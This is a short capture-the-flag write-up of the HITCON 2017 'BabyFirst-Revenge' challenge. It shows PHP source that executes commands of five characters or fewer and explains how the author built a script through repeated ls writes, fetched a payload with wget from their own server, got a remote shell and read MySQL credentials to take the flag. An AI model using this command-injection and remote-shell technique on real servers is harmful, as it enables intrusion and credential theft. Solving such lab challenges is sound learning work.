Home

Awesome

BabyFirst-Revenge-HITCOIN-2017-QUALS

When we visite site, we see

Source Code:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__); 

Here we can execute commands on server, which are <=5. There is an easy way how to solve this task with the help of \ symbol, but i choose the stupid one :D The main idea is to write a php script, which will execute shell command
wget myserverip
, and then run it with
sh index.html ( sh i*)

We will use ls command to write php code in file. But the main difficulty is that ls>>a will first make file a, and then prints it with other files. So i decided to name my file as %0d. Our task is to produce this code
<?php $a="abcdefghijklmnopqrstuvwxyz0123456789 ";$b=$a;$b[0]=$a[23];$b[1]=$a[7];.....;exec($b);

But we must take into account that we can write only 4 characters per time (>abcd); First we must create file %0d, we request http://52.199.204.34/?cmd=>%0d. Secondly we cant create <?php , but luckily <?= will also work. So we run

>\<?=
ls>>%0d
rm *=

Ater each file create and file writing, we must delete it in order not to write it again into %0d file. Then we continue create/write our 'gadgets'.

>\$a
ls>>%0d
rm *a

>=\"
ls>>%0d
rm =*

etc.

All request we can make with help of burpintruder with timeout between requests 1 second. After sending all requests we run

 php ?

index.html will be downloaded on target server. Than we run

. i*

and get remote shell. In the home directory was login/password for MySql database where flag was stored. Than we simply extract data from it and get the flag.